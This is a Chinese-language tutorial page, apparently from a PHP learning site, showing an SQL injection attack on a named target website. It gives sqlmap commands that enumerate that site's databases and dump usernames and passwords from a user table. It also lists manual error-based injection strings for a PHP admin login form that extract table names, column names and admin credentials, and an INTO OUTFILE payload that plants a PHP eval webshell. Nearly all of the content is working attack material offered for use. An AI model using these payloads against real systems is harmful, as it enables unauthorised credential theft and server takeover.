来源:自学PHP网 时间:2015-04-16 23:14 作者: 阅读:次
[导读] 信息探测:目标站点:http: www sixxf it服务器IP:192 232 2xx 97(美国)环境平台:PHP服务器系统:Apache这次用网页探测这个站的信息不是很完整,直接奔主题吧,打开网站后台,在登录帐号...
信息探测: 目标站点:http://www.sixxf.it root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt -p username--dbsroot@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt --dbs -p #指定可测试的参数(?page=1&id=2 -p “page,id”),使用-p参数时,第1次只出1个数据库,第2次才全出来,自行测试! root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt -D sinpf_sinpf --tables
root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt -D sinpf_sinpf -T user --columns
root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt -D sinpf_sinpf -T user -C username,userpassword --dump
思路拓展:看了这个域名,数据库名,是不是感觉有点相似,没错,都是使用一样的,完全可以用社工进入后台,而且可以 PHP后台登陆框手工注入语句 'and(select 1 from(select count(*),concat((select concat(相关函数1,0x20,相关函数2,0x20,......) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 1.爆表名 'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 2.爆列名 'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 3.爆用户和密码 'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 4.导出Webshell 'or 1 AND (SELECT id FROM the_users limit 1 INTO OUTFILE 'D:/sub/jw/safe1.php' lines terminated by '<!--?php eval($_POST[safe])?-->') #
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com